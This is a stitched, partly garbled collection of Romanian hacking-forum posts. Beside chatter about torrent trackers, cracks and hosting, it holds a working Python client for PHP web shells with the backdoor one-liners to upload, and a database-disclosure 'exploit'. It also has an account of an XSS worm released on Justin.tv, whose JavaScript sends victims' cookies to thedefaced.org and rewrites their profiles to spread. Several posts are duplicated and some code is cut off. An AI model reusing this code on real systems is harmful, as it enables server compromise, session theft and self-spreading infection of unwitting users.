hozarares

....si daca ai putea sa faci si scriptic tutorialu` iti vom ramane toti "indatorati" ( indurerati ).Faza este sa mearga pe "goagal adsens"

Andreea, bat`o vina

Si ai o versiune mai veche sau poate ne dai si cracku` de la ultima versiune

Acest topic imi miroase a "capcana" deoarece cel care l`a deschis este in pana de inspiratie in a gasi trackere "noi"...da no`...in fine....here`s few.... Ãëàâíàÿ :: X-Torrents.ru Ãëàâíàÿ :: PSLAN Torrent | P.S.Lan Òîððåíò Òðåêåð http://movie-torrentz.com/ ( la asta dau invitatii la schimb ca`i cel mai mare tracker din Europa ) Asian - Korean - Chinese - Japanese - Thai - HongKong - Movies - TV Drama - Music - Torrents - Asia Torrents Welcome In The World Of XtreMeZone V.3.0.3 Login Torrents Masters-TB PussyTorrents.org Index @ ArenaBG.com Beta Ìóëüòèêè by ArjLover - àðõèâ ñîâåòñêèõ ìóëüòôèëüìîâ, ôèëüìîâ è àóäèî-ñêàçîê ETC , ETC , ETC .......

Un amic are un domeniu .ro si cauta sa`si transfere domeniul gratis ; hostingul sa fie gratis 6 luni daca se poate.Dupa cele 6 luni poate plati pe 1 an sau 2 ani, banu` cash sau transfer bancar/SMS de orice fel( exceptie PayPal ) .De preferinta sa fie hostat in afara Romaniei.Apelez la intelegere..... Ma ajuta cineva ?

In afara faptului ca te poti interna intr`o clinica specializata ( la Bucuresti ) poti sa mergi " la sala ".La sala de fitness vb cu cel care supravegheaza sala ( sa fie sportiv nu ciuri-buri ) si ii spui discret ce problema ai. Te poate ajuta, dar depinde de tine in proprtie de 99 %.Pe langa asta inceteaza sau incearca sa eviti orice fel de contacte cu prietenii, chiar si cu cei pe care ii stii din vedere deoarece ei te pot influenta.Un amic de`al meu a scapat de "boala" asta in 4 luni de mers la sala..... Bafta !!!

In afara faptului ca te poti interna intr`o clinica specializata ( la Bucuresti ) poti sa mergi " la sala ".La sala de fitness vb cu cel care supravegheaza sala ( sa fie sportiv nu ciuri-buri ) si ii spui discret ce problema ai. Te poate ajuta, dar depinde de tine in proprtie de 99 %.Pe langa asta inceteaza sau incearca sa eviti orice fel de contacte cu prietenii, chiar si cu cei pe care ii stii din vedere deoarece ei te pot influenta.Un amic de`al meu a scapat de "boala" asta in 4 luni de mers la sala..... Bafta !!!

# Bug : DB # Exploit : # Dork : you wish http://127.0.0.1/supershop/data2001.mdb http://127.0.0.1/supershop/admin.asp

Fereasca Sfantu`......

Ar merge sa fie folosit si la Google Adsense ?

Wellcome dude .... Dupa cum spune si pax, nu te limita doar la Ozzy.... Cu dedicatie :

Ne0h , nu am alta treaba azi si nici maine si nici in alta zi...dar imi place sa comentez aiurea despre tampeniile pe care le intrebi pe acest forum ....

..pai zi`ne tu, ca doar esti mare hacker....sau fa tu un exploit.

Io ma bag ....

uelcam pustilica.....invata , invata si iar invata ; si fa`o cu PASSION!!! Ce anume inveti tu la Liceul din Zorilor ? Din cate stiu io, de`acolo nu au iesit mari genii si niciun fel de expert dupa 4 ani de studii in ultimii 10 ani....

#!/usr/bin/python # # Malformation's Interactive HTTP GET and POST Shell - fireinthehole.py # Only for UNIX based systems at the moment. # It's a very messy script, but surprisingly it works quite well... # Shouldn't be much need to mess with the variables and configuration # Just cut, paste and own, you 1337 h4x0r, you # # Upload something like this to a php file: # <?php if (isset($_POST["cmd"])) { system($_POST["cmd"]); } ?> # <?php if (isset($_GET["cmd"])) { system($_GET["cmd"]); } ?> # # Kisses go to .aware, OTW, STS, darkc0de, str0ke, some Aussies and anyone keeping the scene alive # Please don't strip the credits out if you modify or redistribute. import sys, os, time, readline print ''' Malformation's Interactive HTTP GET and POST Shell v1.0.0B Command history using readline - Just use the arrow keys Set your prompt like this: set prompt <prompt_here> Host history - attack someone on a rainy day when you're bored Tries to maintain current working directory when you use 'cd'. Usage: \tEnter the host => hacked.com/hacked.php \tGET/POST => POST \tEnter the POST variable => cmd \thacked.com/hacked.php# ls -la \ttotal 8673 \tdrwxr-xr-x 2 web web 4096 2009-09-03 11:54 . \tdrwxr-xr-x 15 web web 4096 2009-09-08 13:37 .. \t-rw-r--r-- 1 web web 481 2009-09-02 18:58 hacked.php \thacked.com/hacked.php# set prompt $ \t$ . \tBye. ''' # # # # # Configuration # # # # # # # # # # # # # # 1 to turn on curl verbosity # debug = 0 # logfile1 = "fireinthehole.txt" # logfile2 = "fireinthehole-hosts.txt" # # # # # # The file handle below is just for appending # # Don't change it # logfile3 = logfile2 # # # # # # # # # # # # # # # # # # # # # # # # # # write = 0 write2 = 0 curl_array = ["/bin/", "/usr/bin/", "/usr/sbin/"] curl_dirs = "" count = 0 finalcommand = "" dir_array = [] set_prompt = 0 prompt = "" number = 0 hosts_array = [] skip_insert = 0 dont_write = 0 for i in range(0,len(curl_array)): if (os.path.exists(curl_array + "curl")): count = count + 1 curl_dirs = curl_dirs + curl_array + " " if (count == 0): print "Couldn't find curl. Tried looking in " + curl_dirs sys.exit(0) try: if (os.path.exists(logfile1)): file = open(logfile1,"a") else: file = open(logfile1,"w") write = 1 print "Output will be saved to " + logfile1 if (os.path.exists(logfile2)): hosts_history = open(logfile2,"r+") hosts_history2 = open(logfile3,"a") else: hosts_history2 = open(logfile3,"a") write2 = 1 print "Hosts will be saved to " + logfile2 except IOError: print "Directory not writable, output will not be saved." try: if (write2 == 1): if (os.path.exists(logfile2)): if (os.path.getsize(logfile2) != 0): print "Previous hosts: " while(1): thisline = hosts_history.readline() thisline = thisline.strip() if thisline: print "\t[" + str(number) + "] " + thisline hosts_array.insert(number, thisline) number = number + 1 else: break while(1): host = raw_input("Enter a number or new host => ") try: host_inted = int(host) except ValueError: break if (type(host_inted) == int): if ((host_inted < len(hosts_array)) and (host_inted > -1)): host = hosts_array[host_inted] skip_insert = 1 break else: print "Wrong number, enter again correctly" continue break else: host = raw_input("Enter the host => ") else: host = raw_input("Enter the host => ") else: host = raw_input("Enter the host => ") readline.add_history(host) #Thanks nemo and andrewg host_split = host.split(",") #This won't affect anything since there is no ',' in a url and it wont get affected, so we don't need to check for bad input if (skip_insert == 0): method = raw_input("GET/POST => ") readline.add_history(method) if (method == "GET"): myvar = raw_input("Enter the GET variable => ") elif (method == "POST"): myvar = raw_input("Enter the POST variable => ") else: sys.exit(0) if ((host_split[0] + "," + method + "," + myvar) in hosts_array): print "You already had this as a previous host!" dont_write = 1 readline.add_history(myvar) else: method = host_split[1] readline.add_history(method) myvar = host_split[2] readline.add_history(myvar) if (write2 == 1): if (skip_insert == 0): if (dont_write == 0): hosts_history2.write(host + "," + method + "," + myvar + "\n") while True: if (set_prompt == 1): mycommand = raw_input(prompt) else: mycommand = raw_input(host_split[0] + "# ") readline.add_history(mycommand) origcommand = mycommand finalcommand = "" if (mycommand == "."): print "Bye." sys.exit(0) if (mycommand.find("set prompt ") != -1): set_prompt = 1 prompt = mycommand[11:len(string)] continue mycommand = mycommand + "; " if (mycommand[0] + mycommand[1] + mycommand[2] == "cd "): dir_array.insert(len(dir_array) + 1, mycommand) if (method == "GET"): string = "curl -s \"" + host + "?" + myvar + "=" + mycommand + "\"" else: string = "curl -s -d \"" + myvar + "=" + mycommand + "\" " + host if (debug == 1): print string + ":\n" continue if (len(dir_array) != 0): for j in range(0,len(dir_array)): finalcommand = finalcommand + dir_array[j] finalcommand = finalcommand + mycommand if (finalcommand != ""): mycommand = finalcommand if (method == "GET"): string = "curl -s \"" + host_split[0] + "?" + myvar + "=" + mycommand + "\"" else: string = "curl -s -d \"" + myvar + "=" + mycommand + "\" " + host_split[0] if (debug == 1): print string + ":\n" command = os.popen(string,"r") if (write == 1): if (set_prompt == 1): file.write(prompt + origcommand + "\n") else: file.write(host_split[0] + "# " + origcommand + "\n") while(1): line = command.readline() line = line.strip() if line: print line if (write == 1): file.write(line + "\n") else: break except KeyboardInterrupt: print "\nBye." sys.exit(0) except: print "Unhandled exception" sys.exit(0)

XSS worms are pretty neat, interactive worms that propagate by using a client's browser to progressively infect other profiles in some way. I wrote my own worm a while back, and I wanted to talk about how it worked, how it was affective, and what challenges I faced. The worm I created was in Justin.Tv. The best thing about XSS worms is that they're as unique as the XSS. Tons of different things may occur, and it's up to many different variables that the worm is successful. The XSS in justin.tv was found by x2Fusion. x2Fusion and I worked on the worm right when we came up with the idea of making one. The XSS was in the Location field. So, people viewing another user's profile would run whatever we put there, as it was not sanitized. But there was one more challenge: the location was placed in the title sanitized. We had to find a way to not only hide the worm in the title, but we also had to impliment some javascript that automatically changed the title as soon as it loaded. Once we started on the worm, we made the .js file on an external website, and before script inclusion we put several HTML comment tags to hide it in the title. In the location javascript, we edited the location javascript (local) to dynamically remove the title, keeping it stealthy (as possible) to avoid other issues. The local javascript also made a hidden, blank iFrame that we could reference in the remove javascript. To start off, the remote javascript would force the iframe to our website and provide, dynamically, the client's cookies and profile location. We would use this to track what profiles were infected by who, and when, and all of the client details at the time. We would create the payload inside the remote javascript that we can use to inject with the viewing user's profile. The "payload" data is pretty much our local javascript. We also added a ^ (rare location element, if you ask me) character after the user's location, which our local javascript will use to manage the dynamic script. What we didn't think about, well... we were in a hurry so it's not our fault, ^ would remain on the titles. People would definately notice, but it wasn't patched until about 24 hours after. We printed a new iFrame (hidden), and used it to read out the details in convinient little sub-frame form elements. We took the elements and processed them, only changing the Location field if it wasn't already infected, and then sending the request (if it wasn't already infected). This was more complicated as it seemed... we had to fight between IE and Firefox (Safari follows Firefox for the most part) compatibility. After doing that, we realized... if the infected person was... well an actual broadcaster, the default page wasn't what we were looking for. Thus, we needed to dynamically read whether certain elements were given on the page, and also go to the correctly named page. We had another request upon new infections that saved user details. Once the request was sent, by then it is assumed the profile was infected and we have it recorded on our side. In-fact, quickly after we released it, I made a quick little PHP script that waited for more accounts to be infected (and their userdetails), and printed out a highlighted table element had it fade out after 5 seconds. After about 1500 profiles, I sat there watching 4 to 10 be infected a second, and it was funny to watch them be infected life. Actually, check it out: function URLEncode (clearString) { var output = ''; var x = 0; clearString = clearString.toString(); var regex = /(^[a-zA-Z0-9_.]*)/; while (x < clearString.length) { var match = regex.exec(clearString.substr(x)); if (match != null && match.length > 1 && match[1] != '') { output += match[1]; x += match[1].length; } else { if (clearString[x] == ' ') output += '+'; else { var charCode = clearString.charCodeAt(x); var hexVal = charCode.toString(16); output += '%' + (hexVal.length < 2 ? '0' : '') + hexVal.toUpperCase(); } x++; } } return output; } function save_settings(action, enctype, method, query) { var xmlHttp; try { xmlHttp = new XMLHttpRequest(); } catch (e) { try { xmlHttp = new ActiveXObject("Msxml2.XMLHTTP"); } catch (e) { try { xmlHttp = new ActiveXObject("Microsoft.XMLHTTP"); } catch (e) { return false; } } } xmlHttp.open(method, action, true); xmlHttp.setRequestHeader('Content-Type', enctype); xmlHttp.send(query); return false; } document.title = document.title.split('^')[0] + " - Justin.tv"; var base64chars = 'ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/'.split(""); var base64inv = { }; for (var i = 0; i < base64chars.length; i++) { base64inv[base64chars] = i; } function b64_d (s) { s = s.replace(new RegExp('[^' + base64chars.join("") + '=]', 'g'), ""); var p = (s.charAt(s.length - 1) == '=' ? (s.charAt(s.length - 2) == '=' ? 'AA' : 'A') : ""); var r = ""; s = s.substr(0, s.length - p.length) + p; for (var c = 0; c < s.length; c += 4) { var n = (base64inv[s.charAt©] << 18) + (base64inv[s.charAt(c + 1)] << 12) + (base64inv[s.charAt(c + 2)] << 6) + base64inv[s.charAt(c + 3)]; r += String.fromCharCode((n >>> 16) & 255, (n >>> 8) & 255, n & 255); } return r.substring(0, r.length - p.length); } function b64_e(s) { var r = ""; var p = ""; var c = s.length % 3; if (c > 0) { for (;c < 3; c++) { p += '='; s += "\0"; } } for (c = 0; c < s.length; c += 3) { if (c > 0 && (c / 3 * 4) % 76 == 0) { r += "\r\n"; } var n = (s.charCodeAt© << 16) + (s.charCodeAt(c + 1) << 8) + s.charCodeAt(c + 2); n = [(n >>> 18) & 63, (n >>> 12) & 63, (n >>> 6) & 63, n & 63]; r += base64chars[n[0]] + base64chars[n[1]] + base64chars[n[2]] + base64chars[n[3] ]; } return r.substring(0, r.length - p.length) + p; } document.getElementById('tframeid').src = "http://thedefaced.org/jtv/jtv_test.php?act=mesh&cookie=" + b64_e(document.cookie) + "&location=" + b64_e(String(window.location)); document.write(""); payload = b64_d( "XjwhLS1BbGwgb3BlbmluZ3MgaW4gYW4gaW50ZXJuYWwgb3IgZXh0ZXJuYWwgZmxvYXRpbmcgcm9 vZiBleGNlcHQgZm9yIGF1dG9tYXRpYyBibGVlZGVyIHZlbnRzICh2YWN1dW0gYnJlYWtlciB2ZW50cyk g YW5kIHJpbSBzcGFjZSB2ZW50cyBtdXN0IHByb3ZpZGUgYSBwcm9qZWN0aW9uIGJlbG93IHRoZSBsaXF1 a WQgc3VyZmFjZSBvciBiZSBlcXVpcHBlZCB3aXRoIGEgY292ZXIsIHNlYWwsIG9yIGxpZCwgd2hpY2ggb X VzdCBiZSBpbiBhIGNsb3NlZCAoaS5lLiwgbm8gdmlzaWJsZSBnYXApIHBvc2l0aW9uIGF0IGFsbCB0aW 1 lcyBleGNlcHQgd2hlbiB0aGUgZGV2aWNlIGlzIGluIGFjdHVhbCB1c2UuLS0+IDxpZnJhbWUgaWQ9J3R m cmFtZWlkJyB3aWR0aD0wIGhlaWdodD0wIGZyYW1lYm9yZGVyPTA+PC9pZnJhbWU+PHNjcmlwdCBzcmM9 I mh0dHA6Ly90aGVkZWZhY2VkLm9yZy9qdHYvanR2X3Rlc3QucGhwP2FjdD1qcyIgbGFuZ3VhZ2U9Imphd m FzY3JpcHQiPjwvc2NyaXB0PiA8IS0tQWxsIG9wZW5pbmdzIGluIGFuIGludGVybmFsIG9yIGV4dGVybm F sIGZsb2F0aW5nIHJvb2YgZXhjZXB0IGZvciBhdXRvbWF0aWMgYmxlZWRlciB2ZW50cyAodmFjdXVtIGJ y ZWFrZXIgdmVudHMpIGFuZCByaW0gc3BhY2UgdmVudHMgbXVzdCBwcm92aWRlIGEgcHJvamVjdGlvbiBi Z WxvdyB0aGUgbGlxdWlkIHN1cmZhY2Ugb3IgYmUgZXF1aXBwZWQgd2l0aCBhIGNvdmVyLCBzZWFsLCBvc i BsaWQsIHdoaWNoIG11c 3QgYmUgaW4gYSBjbG9zZWQgKGkuZS4sIG5vIHZpc2libGUgZ2FwKSBwb3NpdGlvbiBhdCBhbGwgdGltZ XMgZXhjZXB0IHdoZW4gdGhlIGRldmljZSBpcyBpbiBhY3R1YWwgdXNlLi0tPg=="); document.getElementById('tframeset').onload = function () { if (frames['tframeset'].document.getElementById('user_location').value.indexOf( 'All openings in an internal or external floating roof') == -1) { query = "section=profile&session_user="; query += frames['tframeset'].document.getElementById('session_user').value; query += "&subsection=profile_info"; query += "&commit=Save%20Changes"; if (frames['tframeset'].document.getElementById('user_hide_im_watching').value != 1) { query += "&user[hide_profile_actions]=0"; } else { query += "&user[hide_profile_actions]=1"; }; if (frames['tframeset'].document.getElementById('user_hide_profile_actions').value != 1) { query += "&user[hide_profile_actions]=0"; } else { query += "&user[hide_profile_actions]=1"; }; query += "&user[profile_about]=" + URLEncode(frames['tframeset'].document.getElementById('user_profile_about').value); query += "&user[favorite_quotes]=" + URLEncode(frames['tframeset'].document.getElementById('user_favorite_quotes').value); query += "&user[interests]=" + URLEncode(frames['tframeset'].document.getElementById('user_interests').value); query += "&user[location]=" + URLEncode(frames['tframeset'].document.getElementById('user_location').value + payload); query += "&user[sex]=" + frames['tframeset'].document.getElementById('user_sex').value; query += "&user[name]=" + URLEncode(frames['tframeset'].document.getElementById('user_name').value); save_settings('/settings', 'application/x-www-form-urlencoded', 'POST', query); } document.getElementById('tframeset').onload = function () { }; document.getElementById('tframeset').onreadystatechange = function () { }; }; document.getElementById('tframeset').onreadyst

am de toate...pret 8500 $ usor negociabil

Cu asta a mers.....thx pyth0n3

Daca te uiti mai atent pe filebox.ro, mai jos, vezi fi mirat sau uimit cand vei descoperii motorul de cautare.........ceea ce caut eu nu se gaseste pe torrent ......

Merci de ajutor ,dar eu vreau filmu` ,nu traileru`...... Fisierul este in acest format : http://www.filebox.ro/video/play_video.php?key=uemnqtkrd7obxxxx

aha....dar faza este ca nu`mi face download la .avi , nefiind hostat niciun fisier pe server, ci imi face download la .htm. IO VREAU SA DESCARC FILMU`......

...vreau sa fac download la un film de pe filebox.ro. Stiti careva vreo modalitate in genu` YouTube download ?

da nu ai in intregime toata conversatia ?

Nexus One, primul telefon proiectat si vandut direct de Google, va putea fi cumparat prin intermediul unui magazin online gazduit de Google , Nexus One Phone , la un pret de 529 dolari la liber si la pretul de 179 dolari impreuna cu un abonament pe doi ani la operatorul T-Mobile din Statele Unite ale Americii, a anuntat marti compania. Pentru inceput, Google primeste comenzi de la consumatorii din Statele Unite ale Americii, Marea Britanie, Singapore si Hong Kong. In viitorul apropiat, telefonul va fi vandut in Europa prin Vodafone. In afara de operatorul T-Mobile, Nexus One urmeaza sa fie vandut "in viitorul apropiat" de catre Verizon Wireless pe piata americana si de catre Vodafone in Europa. Google a mai anuntat ca in lunile urmatoare va incheia parteneriate cu alti operatori si ca in viitor va lansa alte telefoane Android si ca va face disponibil magazinul online si pentru utilizatorii din alte tari. Pe Nexus One, telefon dezvoltat de HTC si considerat de oficialii Google drept un "super telefon", ruleaza versiunea 2.1 a sistemului de operare open-source Android, telefonul avand printre altele procesor Qualcomm Snapdragon de 1GHz, ecran tactil de 3,7 inch, 512 MB RAM, card de memorie de 4 GB inclus, cu posibilitatea de extindere pana la 32 GB si camera foto de 5 megapixeli. Telefonul are o grosime de 11,5 mm si cantareste 130 de grame.